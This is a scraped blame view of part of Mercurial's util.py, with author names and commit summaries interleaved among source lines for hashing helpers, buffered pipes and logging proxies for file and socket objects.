##// END OF EJS Templates
tests: add tests of pathcopies()...
tests: add tests of pathcopies() I'm working on support for storing copy metadata in the changeset instead of in the filelog. When storing it in the changeset, it will obviously be efficient to get the copy metadata for all files in a single changeset, but it will be more expensive to get the copy metadata all revisions of a single file. Some algorithms will then need to be optimized differently. The first method I'm going to rewrite is pathcopies(). This commit adds many tests for pathcopies(), so we can run the tests with both old and new versions of the code, as well as with metadata stored in filelog or in changeset (later). They use the debugpathcopies command I recently added (with no tests when it was added). They show a few bugs and few cases of slightly weird behavior. I'll fix the bugs in the next few commits. Differential Revision: https://phab.mercurial-scm.org/D5986

File last commit:

r41429:b141b524 default
r41917:4ec0ce0f default
Show More
util.py
4021 lines | 125.4 KiB | text/x-python | PythonLexer
timeless@mozdev.org
spelling: specific
r17515 # util.py - Mercurial utility functions and platform specific implementations
Martin Geisler
put license and copyright info into comment blocks
r8226 #
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
Matt Mackall
Update license to GPLv2+
r10263 # GNU General Public License version 2 or any later version.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082
timeless@mozdev.org
spelling: specific
r17515 """Mercurial utility functions and platform specific implementations.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082
Martin Geisler
turn some comments back into module docstrings
r8227 This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082 """
mpm@selenic.com
[PATCH] file seperator handling for the other 'OS'...
r419
Yuya Nishihara
doctest: use print_function and convert bytes to unicode where needed
r34139 from __future__ import absolute_import, print_function
Gregory Szorc
util: use absolute_import
r27358
Martin von Zweigbergk
util: add base class for transactional context managers...
r33790 import abc
Gregory Szorc
util: use absolute_import
r27358 import bz2
import collections
Martin von Zweigbergk
histedit: extract InterventionRequired transaction handling to utils...
r33446 import contextlib
Gregory Szorc
util: use absolute_import
r27358 import errno
import gc
import hashlib
Mark Thomas
util: add safename function for generating safe names to rename to...
r34555 import itertools
Mark Thomas
util: add an mmapread method...
r34296 import mmap
Gregory Szorc
util: use absolute_import
r27358 import os
Jun Wu
util: improve iterfile so it chooses code path wisely...
r30418 import platform as pyplatform
Siddharth Agarwal
util: rename 're' to 'remod'...
r21907 import re as remod
Gregory Szorc
util: use absolute_import
r27358 import shutil
import socket
Jun Wu
util: improve iterfile so it chooses code path wisely...
r30418 import stat
Gregory Szorc
util: use absolute_import
r27358 import sys
import time
import traceback
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950 import warnings
Pierre-Yves David
changegroup: move all compressions utilities in util...
r26266 import zlib
Matt Mackall
Add encoding detection
r3769
Martijn Pieters
util: create a context manager to handle timing...
r38833 from .thirdparty import (
attr,
)
Augie Fackler
util: make timedcm require the label (API)...
r39295 from hgdemandimport import tracing
Gregory Szorc
util: use absolute_import
r27358 from . import (
encoding,
error,
i18n,
Pulkit Goyal
py3: use node.hex(h.digest()) instead of h.hexdigest()...
r35600 node as nodemod,
Yuya Nishihara
osutil: switch to policy importer...
r32367 policy,
timeless
pycompat: add empty and queue to handle py3 divergence...
r28818 pycompat,
Augie Fackler
urllibcompat: move some adapters from pycompat to urllibcompat...
r34468 urllibcompat,
Gregory Szorc
util: use absolute_import
r27358 )
Yuya Nishihara
stringutil: move generic string helpers to new module...
r37101 from .utils import (
Yuya Nishihara
procutil: move process/executable management functions to new module...
r37136 procutil,
Yuya Nishihara
stringutil: move generic string helpers to new module...
r37101 stringutil,
)
Matt Mackall
Add encoding detection
r3769
Yuya Nishihara
base85: switch to policy importer
r32368 base85 = policy.importmod(r'base85')
Yuya Nishihara
osutil: switch to policy importer...
r32367 osutil = policy.importmod(r'osutil')
Yuya Nishihara
parsers: switch to policy importer...
r32372 parsers = policy.importmod(r'parsers')
Yuya Nishihara
osutil: switch to policy importer...
r32367
Yuya Nishihara
base85: proxy through util module...
r32200 b85decode = base85.b85decode
b85encode = base85.b85encode
Gregory Szorc
util: make cookielib module available...
r31934 cookielib = pycompat.cookielib
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 httplib = pycompat.httplib
pickle = pycompat.pickle
Yuya Nishihara
util: make safehasattr() a pycompat function...
r37117 safehasattr = pycompat.safehasattr
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 socketserver = pycompat.socketserver
Gregory Szorc
util: prefer "bytesio" to "stringio"...
r36976 bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 xmlrpclib = pycompat.xmlrpclib
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883
Augie Fackler
urllibcompat: move some adapters from pycompat to urllibcompat...
r34468 httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq
FUJIWARA Katsunori
win32mbcs: avoid unintentional failure at colorization...
r32566 # workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
Jun Wu
codemod: use pycompat.iswindows...
r34646 if pycompat.iswindows:
Gregory Szorc
util: use absolute_import
r27358 from . import windows as platform
Adrian Buehlmann
util: move windows and posix wildcard imports to begin of file
r14912 else:
Gregory Szorc
util: use absolute_import
r27358 from . import posix as platform
Adrian Buehlmann
util: eliminate wildcard imports
r14926
Gregory Szorc
util: use absolute_import
r27358 _ = i18n._
Adrian Buehlmann
util: eliminate wildcard imports
r14926
Yuya Nishihara
chgserver: extract utility to bind unix domain socket to long path...
r29530 bindunixsocket = platform.bindunixsocket
Idan Kamara
posix, windows: introduce cachestat...
r14927 cachestat = platform.cachestat
Adrian Buehlmann
util: eliminate wildcard imports
r14926 checkexec = platform.checkexec
checklink = platform.checklink
Adrian Buehlmann
util: move copymode into posix.py and windows.py...
r15011 copymode = platform.copymode
Adrian Buehlmann
util: eliminate wildcard imports
r14926 expandglobs = platform.expandglobs
Matt Harbison
util: add a function to show the mount point of the filesystem...
r35531 getfsmountpoint = platform.getfsmountpoint
Matt Harbison
util: move getfstype() to the platform modules...
r35527 getfstype = platform.getfstype
Adrian Buehlmann
util: eliminate wildcard imports
r14926 groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
Yuya Nishihara
osutil: proxy through util (and platform) modules (API)...
r32203 listdir = osutil.listdir
Adrian Buehlmann
util: eliminate wildcard imports
r14926 localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
Matt Mackall
dirstate: fix case-folding identity for traditional Unix...
r15488 normcase = platform.normcase
Siddharth Agarwal
util: add normcase spec and fallback...
r24605 normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
Adrian Buehlmann
util: eliminate wildcard imports
r14926 openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
Pierre-Yves David
util: add a simple poll utility...
r25420 poll = platform.poll
Adrian Buehlmann
util: eliminate wildcard imports
r14926 posixfile = platform.posixfile
Matt Harbison
py3: convert os.readlink() path to native strings on Windows...
r39940 readlink = platform.readlink
Adrian Buehlmann
util: eliminate wildcard imports
r14926 rename = platform.rename
FUJIWARA Katsunori
util: add removedirs as platform depending function...
r24692 removedirs = platform.removedirs
Adrian Buehlmann
util: eliminate wildcard imports
r14926 samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
Bryan O'Sullivan
util: implement a faster os.path.split for posix systems...
r17560 split = platform.split
Bryan O'Sullivan
osutil: write a C implementation of statfiles for unix...
r18026 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
Bryan O'Sullivan
util: add functions to check symlink/exec bits...
r18868 statisexec = platform.statisexec
statislink = platform.statislink
Adrian Buehlmann
util: eliminate wildcard imports
r14926 umask = platform.umask
unlink = platform.unlink
username = platform.username
Adrian Buehlmann
util: move windows and posix wildcard imports to begin of file
r14912
Yuya Nishihara
osutil: proxy through util (and platform) modules (API)...
r32203 try:
recvfds = osutil.recvfds
except AttributeError:
pass
Dirkjan Ochtman
python 2.6 compatibility: compatibility wrappers for hash functions
r6470 # Python compatibility
Matt Mackall
Add encoding detection
r3769
Matt Mackall
util: clean up function ordering
r15656 _notset = object()
Remi Chaintron
revlog: flag processor...
r30745 def bitsfrom(container):
bits = 0
for bit in container:
bits |= bit
return bits
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950 # python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
# explicitly unfilter our warning for python 2.7
#
# The option of setting PYTHONWARNINGS in the test runner was investigated.
# However, module name set through PYTHONWARNINGS was exactly matched, so
# we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
# makes the whole PYTHONWARNINGS thing useless for our usecase.
Augie Fackler
util: pass sysstrs to warnings.filterwarnings...
r31952 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
Yuya Nishihara
py3: silence "bad escape" warning emitted by re.sub()...
r36606 if _dowarn and pycompat.ispy3:
# silence warning emitted by passing user string to re.sub()
warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
r'mercurial')
Augie Fackler
util: also silence py3 warnings from codec module...
r36715 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
DeprecationWarning, r'mercurial')
Yuya Nishihara
py3: silence warning about deprecation of imp module...
r37473 # TODO: reinvent imp.is_frozen()
warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
DeprecationWarning, r'mercurial')
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950
def nouideprecwarn(msg, version, stacklevel=1):
"""Issue an python native deprecation warning
This is a noop outside of tests, use 'ui.deprecwarn' when possible.
"""
if _dowarn:
msg += ("\n(compatibility will be dropped after Mercurial-%s,"
" update your code.)") % version
Augie Fackler
util: call warnings.warn() with a sysstr in nouideprecwarn...
r36145 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950
Mike Hommey
util: add a helper class to compute digests...
r22962 DIGESTS = {
Augie Fackler
util: drop local aliases for md5, sha1, sha256, and sha512...
r29342 'md5': hashlib.md5,
'sha1': hashlib.sha1,
'sha512': hashlib.sha512,
Mike Hommey
util: add a helper class to compute digests...
r22962 }
# List of digest types from strongest to weakest
Gregory Szorc
util: make hashlib import unconditional...
r27357 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
Mike Hommey
util: add a helper class to compute digests...
r22962
for k in DIGESTS_BY_STRENGTH:
assert k in DIGESTS
class digester(object):
"""helper to compute digests.
This helper can be used to compute one or more digests given their name.
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> d = digester([b'md5', b'sha1'])
>>> d.update(b'foo')
Mike Hommey
util: add a helper class to compute digests...
r22962 >>> [k for k in sorted(d)]
['md5', 'sha1']
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> d[b'md5']
Mike Hommey
util: add a helper class to compute digests...
r22962 'acbd18db4cc2f85cedef654fccc4a4d8'
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> d[b'sha1']
Mike Hommey
util: add a helper class to compute digests...
r22962 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> digester.preferred([b'md5', b'sha1'])
Mike Hommey
util: add a helper class to compute digests...
r22962 'sha1'
"""
def __init__(self, digests, s=''):
self._hashes = {}
for k in digests:
if k not in DIGESTS:
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_('unknown digest type: %s') % k)
Mike Hommey
util: add a helper class to compute digests...
r22962 self._hashes[k] = DIGESTS[k]()
if s:
self.update(s)
def update(self, data):
for h in self._hashes.values():
h.update(data)
def __getitem__(self, key):
if key not in DIGESTS:
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_('unknown digest type: %s') % k)
Pulkit Goyal
py3: use node.hex(h.digest()) instead of h.hexdigest()...
r35600 return nodemod.hex(self._hashes[key].digest())
Mike Hommey
util: add a helper class to compute digests...
r22962
def __iter__(self):
return iter(self._hashes)
@staticmethod
def preferred(supported):
"""returns the strongest digest type in both supported and DIGESTS."""
for k in DIGESTS_BY_STRENGTH:
if k in supported:
return k
return None
Mike Hommey
util: add a file handle wrapper class that does hash digest validation...
r22963 class digestchecker(object):
"""file handle wrapper that additionally checks content against a given
size and digests.
d = digestchecker(fh, size, {'md5': '...'})
When multiple digests are given, all of them are validated.
"""
def __init__(self, fh, size, digests):
self._fh = fh
self._size = size
self._got = 0
self._digests = dict(digests)
self._digester = digester(self._digests.keys())
def read(self, length=-1):
content = self._fh.read(length)
self._digester.update(content)
self._got += len(content)
return content
def validate(self):
if self._size != self._got:
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_('size mismatch: expected %d, got %d') %
(self._size, self._got))
Mike Hommey
util: add a file handle wrapper class that does hash digest validation...
r22963 for k, v in self._digests.items():
if v != self._digester[k]:
Wagner Bruna
i18n: add hint to digest mismatch message
r23076 # i18n: first parameter is a digest name
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_('%s mismatch: expected %s, got %s') %
(k, v, self._digester[k]))
Mike Hommey
util: add a file handle wrapper class that does hash digest validation...
r22963
Renato Cunha
util: improved the check for the existence of the 'buffer' builtin...
r11565 try:
Matt Mackall
util: don't mess with builtins to emulate buffer()
r15657 buffer = buffer
Renato Cunha
util: improved the check for the existence of the 'buffer' builtin...
r11565 except NameError:
Alex Gaynor
util: remove dead code which used to be for old python2 versions...
r33549 def buffer(sliceable, offset=0, length=None):
if length is not None:
return memoryview(sliceable)[offset:offset + length]
return memoryview(sliceable)[offset:]
Ronny Pfannschmidt
util: fake the builtin buffer if it's missing (jython)
r10756
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 _chunksize = 4096
class bufferedinputpipe(object):
"""a manually buffered input pipe
Python will not let us use buffered IO and lazy reading with 'polling' at
the same time. We cannot probe the buffer state and select will not detect
that data are ready to read if they are already buffered.
This class let us work around that by implementing its own buffering
(allowing efficient readline) while offering a way to know if the buffer is
empty from the output (allowing collaboration of the buffer with polling).
This class lives in the 'util' module because it makes use of the 'os'
module from the python stdlib.
"""
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 def __new__(cls, fh):
# If we receive a fileobjectproxy, we need to use a variation of this
# class that notifies observers about activity.
if isinstance(fh, fileobjectproxy):
cls = observedbufferedinputpipe
return super(bufferedinputpipe, cls).__new__(cls)
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406
def __init__(self, input):
self._input = input
self._buffer = []
self._eof = False
Pierre-Yves David
bufferedinputpipe: remove N^2 computation of buffer length (issue4735)...
r25672 self._lenbuf = 0
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406
@property
def hasbuffer(self):
"""True is any data is currently buffered
This will be used externally a pre-step for polling IO. If there is
already data then no polling should be set in place."""
return bool(self._buffer)
@property
def closed(self):
return self._input.closed
def fileno(self):
return self._input.fileno()
def close(self):
return self._input.close()
def read(self, size):
while (not self._eof) and (self._lenbuf < size):
self._fillbuffer()
return self._frombuffer(size)
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 def unbufferedread(self, size):
if not self._eof and self._lenbuf == 0:
self._fillbuffer(max(size, _chunksize))
return self._frombuffer(min(self._lenbuf, size))
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 def readline(self, *args, **kwargs):
Martin von Zweigbergk
cleanup: some Yoda conditions, this patch removes...
r40065 if len(self._buffer) > 1:
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 # this should not happen because both read and readline end with a
# _frombuffer call that collapse it.
self._buffer = [''.join(self._buffer)]
Pierre-Yves David
bufferedinputpipe: remove N^2 computation of buffer length (issue4735)...
r25672 self._lenbuf = len(self._buffer[0])
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 lfi = -1
if self._buffer:
lfi = self._buffer[-1].find('\n')
while (not self._eof) and lfi < 0:
self._fillbuffer()
if self._buffer:
lfi = self._buffer[-1].find('\n')
size = lfi + 1
if lfi < 0: # end of file
size = self._lenbuf
Martin von Zweigbergk
cleanup: some Yoda conditions, this patch removes...
r40065 elif len(self._buffer) > 1:
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 # we need to take previous chunks into account
size += self._lenbuf - len(self._buffer[-1])
return self._frombuffer(size)
def _frombuffer(self, size):
"""return at most 'size' data from the buffer
The data are removed from the buffer."""
if size == 0 or not self._buffer:
return ''
buf = self._buffer[0]
Martin von Zweigbergk
cleanup: some Yoda conditions, this patch removes...
r40065 if len(self._buffer) > 1:
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 buf = ''.join(self._buffer)
data = buf[:size]
buf = buf[len(data):]
if buf:
self._buffer = [buf]
Pierre-Yves David
bufferedinputpipe: remove N^2 computation of buffer length (issue4735)...
r25672 self._lenbuf = len(buf)
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 else:
self._buffer = []
Pierre-Yves David
bufferedinputpipe: remove N^2 computation of buffer length (issue4735)...
r25672 self._lenbuf = 0
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 return data
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 def _fillbuffer(self, size=_chunksize):
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 """read data to the buffer"""
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 data = os.read(self._input.fileno(), size)
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 if not data:
self._eof = True
else:
Pierre-Yves David
bufferedinputpipe: remove N^2 computation of buffer length (issue4735)...
r25672 self._lenbuf += len(data)
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
r25406 self._buffer.append(data)
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 return data
Mark Thomas
util: add an mmapread method...
r34296 def mmapread(fp):
try:
fd = getattr(fp, 'fileno', lambda: fp)()
return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
except ValueError:
# Empty files cannot be mmapped, but mmapread should still work. Check
# if the file is empty, and if so, return an empty buffer.
if os.fstat(fd).st_size == 0:
return ''
raise
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 class fileobjectproxy(object):
"""A proxy around file objects that tells a watcher when events occur.
This type is intended to only be used for testing purposes. Think hard
before using it in important code.
"""
__slots__ = (
r'_orig',
r'_observer',
)
def __init__(self, fh, observer):
Augie Fackler
util: add missing r prefix on some __setattr__ calls...
r36602 object.__setattr__(self, r'_orig', fh)
object.__setattr__(self, r'_observer', observer)
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541
def __getattribute__(self, name):
ours = {
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 r'_observer',
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 # IOBase
r'close',
# closed if a property
r'fileno',
r'flush',
r'isatty',
r'readable',
r'readline',
r'readlines',
r'seek',
r'seekable',
r'tell',
r'truncate',
r'writable',
r'writelines',
# RawIOBase
r'read',
r'readall',
r'readinto',
r'write',
# BufferedIOBase
# raw is a property
r'detach',
# read defined above
r'read1',
# readinto defined above
# write defined above
}
# We only observe some methods.
if name in ours:
return object.__getattribute__(self, name)
return getattr(object.__getattribute__(self, r'_orig'), name)
Matt Harbison
util: forward __bool__()/__nonzero__() on fileobjectproxy...
r36850 def __nonzero__(self):
return bool(object.__getattribute__(self, r'_orig'))
__bool__ = __nonzero__
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 def __delattr__(self, name):
return delattr(object.__getattribute__(self, r'_orig'), name)
def __setattr__(self, name, value):
return setattr(object.__getattribute__(self, r'_orig'), name, value)
def __iter__(self):
return object.__getattribute__(self, r'_orig').__iter__()
def _observedcall(self, name, *args, **kwargs):
# Call the original object.
orig = object.__getattribute__(self, r'_orig')
res = getattr(orig, name)(*args, **kwargs)
# Call a method on the observer of the same name with arguments
# so it can react, log, etc.
observer = object.__getattribute__(self, r'_observer')
fn = getattr(observer, name, None)
if fn:
fn(res, *args, **kwargs)
return res
def close(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'close', *args, **kwargs)
def fileno(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'fileno', *args, **kwargs)
def flush(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'flush', *args, **kwargs)
def isatty(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'isatty', *args, **kwargs)
def readable(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'readable', *args, **kwargs)
def readline(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'readline', *args, **kwargs)
def readlines(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'readlines', *args, **kwargs)
def seek(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'seek', *args, **kwargs)
def seekable(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'seekable', *args, **kwargs)
def tell(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'tell', *args, **kwargs)
def truncate(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'truncate', *args, **kwargs)
def writable(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'writable', *args, **kwargs)
def writelines(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'writelines', *args, **kwargs)
def read(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'read', *args, **kwargs)
def readall(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'readall', *args, **kwargs)
def readinto(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'readinto', *args, **kwargs)
def write(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'write', *args, **kwargs)
def detach(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'detach', *args, **kwargs)
def read1(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'read1', *args, **kwargs)
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 class observedbufferedinputpipe(bufferedinputpipe):
"""A variation of bufferedinputpipe that is aware of fileobjectproxy.
``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
bypass ``fileobjectproxy``. Because of this, we need to make
``bufferedinputpipe`` aware of these operations.
This variation of ``bufferedinputpipe`` can notify observers about
``os.read()`` events. It also re-publishes other events, such as
``read()`` and ``readline()``.
"""
def _fillbuffer(self):
res = super(observedbufferedinputpipe, self)._fillbuffer()
fn = getattr(self._input._observer, r'osread', None)
if fn:
fn(res, _chunksize)
return res
# We use different observer methods because the operation isn't
# performed on the actual file object but on us.
def read(self, size):
res = super(observedbufferedinputpipe, self).read(size)
fn = getattr(self._input._observer, r'bufferedread', None)
if fn:
fn(res, size)
return res
def readline(self, *args, **kwargs):
res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
fn = getattr(self._input._observer, r'bufferedreadline', None)
if fn:
fn(res)
return res
Gregory Szorc
util: observable proxy objects for sockets...
r37028 PROXIED_SOCKET_METHODS = {
r'makefile',
r'recv',
r'recvfrom',
r'recvfrom_into',
r'recv_into',
r'send',
r'sendall',
r'sendto',
r'setblocking',
r'settimeout',
r'gettimeout',
r'setsockopt',
}
class socketproxy(object):
"""A proxy around a socket that tells a watcher when events occur.
This is like ``fileobjectproxy`` except for sockets.
This type is intended to only be used for testing purposes. Think hard
before using it in important code.
"""
__slots__ = (
r'_orig',
r'_observer',
)
def __init__(self, sock, observer):
object.__setattr__(self, r'_orig', sock)
object.__setattr__(self, r'_observer', observer)
def __getattribute__(self, name):
if name in PROXIED_SOCKET_METHODS:
return object.__getattribute__(self, name)
return getattr(object.__getattribute__(self, r'_orig'), name)
def __delattr__(self, name):
return delattr(object.__getattribute__(self, r'_orig'), name)
def __setattr__(self, name, value):
return setattr(object.__getattribute__(self, r'_orig'), name, value)
def __nonzero__(self):
return bool(object.__getattribute__(self, r'_orig'))
__bool__ = __nonzero__
def _observedcall(self, name, *args, **kwargs):
# Call the original object.
orig = object.__getattribute__(self, r'_orig')
res = getattr(orig, name)(*args, **kwargs)
# Call a method on the observer of the same name with arguments
# so it can react, log, etc.
observer = object.__getattribute__(self, r'_observer')
fn = getattr(observer, name, None)
if fn:
fn(res, *args, **kwargs)
return res
def makefile(self, *args, **kwargs):
res = object.__getattribute__(self, r'_observedcall')(
r'makefile', *args, **kwargs)
# The file object may be used for I/O. So we turn it into a
# proxy using our observer.
observer = object.__getattribute__(self, r'_observer')
return makeloggingfileobject(observer.fh, res, observer.name,
reads=observer.reads,
writes=observer.writes,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 logdata=observer.logdata,
logdataapis=observer.logdataapis)
Gregory Szorc
util: observable proxy objects for sockets...
r37028
def recv(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'recv', *args, **kwargs)
def recvfrom(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'recvfrom', *args, **kwargs)
def recvfrom_into(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'recvfrom_into', *args, **kwargs)
def recv_into(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'recv_info', *args, **kwargs)
def send(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'send', *args, **kwargs)
def sendall(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'sendall', *args, **kwargs)
def sendto(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'sendto', *args, **kwargs)
def setblocking(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'setblocking', *args, **kwargs)
def settimeout(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'settimeout', *args, **kwargs)
def gettimeout(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'gettimeout', *args, **kwargs)
def setsockopt(self, *args, **kwargs):
return object.__getattribute__(self, r'_observedcall')(
r'setsockopt', *args, **kwargs)
class baseproxyobserver(object):
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 def _writedata(self, data):
if not self.logdata:
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('\n')
self.fh.flush()
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 return
# Simple case writes all data on a single line.
if b'\n' not in data:
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
Yuya Nishihara
stringutil: drop escapedata() in favor of escapestr()...
r37338 self.fh.write(': %s\n' % stringutil.escapestr(data))
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 else:
Yuya Nishihara
stringutil: bulk-replace call sites to point to new module...
r37102 self.fh.write('%s> %s\n'
Yuya Nishihara
stringutil: drop escapedata() in favor of escapestr()...
r37338 % (self.name, stringutil.escapestr(data)))
Matt Harbison
wireproto: explicitly flush stdio to prevent stalls on Windows...
r37006 self.fh.flush()
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 return
# Data with newlines is written to multiple lines.
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write(':\n')
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 lines = data.splitlines(True)
for line in lines:
Yuya Nishihara
stringutil: bulk-replace call sites to point to new module...
r37102 self.fh.write('%s> %s\n'
Yuya Nishihara
stringutil: drop escapedata() in favor of escapestr()...
r37338 % (self.name, stringutil.escapestr(line)))
Matt Harbison
wireproto: explicitly flush stdio to prevent stalls on Windows...
r37006 self.fh.flush()
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541
Gregory Szorc
util: observable proxy objects for sockets...
r37028 class fileobjectobserver(baseproxyobserver):
"""Logs file object activity."""
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
logdataapis=True):
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self.fh = fh
self.name = name
self.logdata = logdata
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 self.logdataapis = logdataapis
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self.reads = reads
self.writes = writes
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 def read(self, res, size=-1):
if not self.reads:
return
Augie Fackler
util: work around Python 3 returning None at EOF instead of ''...
r36603 # Python 3 can return None from reads at EOF instead of empty strings.
if res is None:
res = ''
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541
Augie Fackler
tests: suppress read(-1) -> '' calls in fileobjectobserver...
r38334 if size == -1 and res == '':
# Suppress pointless read(-1) calls that return
# nothing. These happen _a lot_ on Python 3, and there
# doesn't seem to be a better workaround to have matching
# Python 2 and 3 behavior. :(
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
